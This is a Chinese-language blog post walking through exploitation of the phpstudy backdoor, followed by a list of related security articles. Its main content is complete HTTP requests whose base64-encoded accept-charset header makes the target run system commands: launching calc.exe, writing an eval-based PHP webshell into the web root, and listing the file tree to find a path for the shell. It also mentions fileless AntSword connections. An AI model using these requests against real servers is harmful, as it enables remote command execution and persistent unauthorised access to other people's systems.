php命令执行后门,phpstudy后门利用方法及getshell
0x01 phpstudy利用方法请求任意后缀为php的文件
目标环境为php5.2,5.4,且不能为nts
存在Accept-Encoding: gzip,deflate
此处填写base64加密后的payload:accept-charset: c3lzdGVtKCdjYWxjLmV4ZScpOwGET /phpinfo.php HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Edg/77.0.235.27
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Sec-Fetch-Site: none,
accept-charset: c3lzdGVtKCdjYWxjLmV4ZScpOw
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.9
0x02 getshell 远程连接
system('echo ^<?php @eval($_POST["shell"])?^>>PHPTutorial\WWW\shell.php');↓c3lzdGVtKCdlY2hvIF48P3BocCBAZXZhbCgkX1BPU1RbInNoZWxsIl0pP14+PlBIUFR1dG9yaWFsXFdXV1xzaGVsbC5waHAnKTs=GET /phpinfo.php HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Edg/77.0.235.27
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Sec-Fetch-Site: none,
accept-charset: c3lzdGVtKCdlY2hvIF48P3BocCBAZXZhbCgkX1BPU1RbInNoZWxsIl0pP14+PlBIUFR1dG9yaWFsXFdXV1xzaGVsbC5waHAnKTs=
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.9
0x03 无文件落地getshell利用phpstudy的后门实现无文件落地蚁剑getshell,但有时会不成功,设置完毕后连接即可
0x04 可能会遇到的问题若无法成功连接,可能生成目录不对,执行命令tree /f查看文件树,找到可访问路径生成shellGET /phpinfo.php HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Edg/77.0.235.27
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Sec-Fetch-Site: none,
accept-charset: c3lzdGVtKCd0cmVlIC9mJyk7
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.9
php命令执行后门,phpstudy后门利用方法及getshell相关推荐
- ImageMagick命令执行漏洞(CVE-2016–3714)利用及测试
ImageMagick命令执行漏洞(CVE-2016–3714) 5月3日,ImageMagick官方披露称,目前ImageMagick存在一处远程命令执行漏洞(CVE-2016–3714),当其处理 ...
- 【渗透测试实战】PHP语言有哪些后门?以及利用方法
目录 后门 php.ini构成的后门 .user.ini文件构成的PHP后门 反序列化 PHP序列化实现 常见处理器 序列化格式 private与protect PHP反序列化漏洞 利用点 SoapC ...
- Web安全 RCE漏洞(命令执行漏洞的 测试和利用).
系统命令执行的概括 系统命令执行一般是 在Web应用中,可能有时候需要调用一些系统命令来执行,而程序在开发的时候没有对输入进行严格的过滤,导致恶意用户可以构造一些恶意的系统命令,从而达成系统命令执行攻 ...
- 绕过WAF运行命令执行漏洞的方法大全
文章目录 **前言** **一.windows下** 二.进入linux 三.一个有趣的例子 总结 前言 作者:掌控安全-桐镜 今天发散一下思维,聊聊关于命令执行漏洞绕过过滤的方法,让我们一起由浅入深 ...
- 浅谈PHP无回显命令执行的利用
本文首发于先知社区 前言 在CTF题或在一些渗透测试中往往会遇到没有回显的命令执行漏洞,为了能更好的实现对无回显命令执行漏洞的利用,我对此进行了简单总结. 判断方法 命令执行可能会存在命令执行但没有回 ...
- CTF之萌新web学习(命令执行2)
命令执行2 命令执行无回显情况 可控字符串长度限制getshell 15个字符 7个字符 4或5个字符 无字母数字getshell 异或运算 取反 自增 进行实验测试 命令执行无回显情况 判断方法 使 ...
- python supervisord 远程命令执行漏洞(CVE-2017-11610)
Supervisord Supervisord是一款Python开发,用于管理后台应用(服务)的工具,其角色类似于Linux自带的Systemd. 我觉得它相比Systemd有几个特点: 配置比较简单 ...
- DiscuzX系列命令执行分析公开(三连弹)
tang3 · 2015/01/15 18:55 0x00 漏洞概要 昨天360补天发了这样的一条微博: 然后打听了一下细节,发现居然是我13年7月报给TSRC的漏洞,看今天大家玩的挺开心,与TSRC ...
- bulldog-1靶机 write up 源码 MD5解密得到密码到后台 命令执行绕过 反弹shell string分析文件得到密码提权
bulldog-1靶机 write up 0x00 环境搭建 0x01 信息收集 0x02 漏洞挖掘 web漏洞思路 ssh 利用思路 步骤一:浏览网页 爆破目录 步骤二: 破解hash 步骤三:利用 ...
最新文章
- 团队作业—第二阶段06
- 微型计算机原理实验报告总结,微机原理实验报告-两个多位十进制数相加的实验等.doc...
- 【数学基础】概率论——p(x|\theta)和p(x;\theta)的区别
- P2055-假期的宿舍【网络流,最大流,最大匹配】
- 漫画:高并发下的HashMap
- React开发(264):react使用国际化
- 微信小程序python_用python一步一步教你玩微信小程序【跳一跳】
- matlab定积分矩形法实验,MATLAB实验三 定积分的近似计算
- 学校图书馆借阅管理系统软件项目分析
- layui表单验证规则
- Python matplotlib画图表
- 字符串转数字函数 atol、atoll和strtol、strtoll、strtoul、strtoull 分析
- Qt实现Toast提示消息
- Android使用BottomNavigationView+NavigationUI报错
- 直播:京东大数据的应用!
- Invalid row number (65536) outside allowable range (0..65535)
- 花呗能不能不还?支付宝说春节集五福中彩蛋可帮还
- Visual C++ 6.0 ( VC 6 )带 SP6 中英文双语版 下载
- initramfs详解-----初识initramfs
- 如何安装第三方站点下载的Matlab工具箱或硬件支持包,亲测有效。
热门文章
- 【python】无规律时间步长时序数据转为固定步长
- 博途PLC 1200/1500PLC MODBUS-RTU通讯优化(状态机编程)
- Mysql将某一列值统一拼接一个字符串
- iphone和ipad设备分辨率
- min4 vs mini5 一定要买 iPad mini5,听我一一道来。
- 电力机车电子脚踏开关中霍尔开关的选择DRV5013/CHA442
- NNDL 实验六 卷积神经网络(5)使用预训练resnet18实现CIFAR-10分类
- 计算机毕业设计JAVA工资管理系统mybatis+源码+调试部署+系统+数据库+lw
- pc客户端网易云部分电台节目播放过程中声音消失的问题
- winrar 命令行制作自解压安装包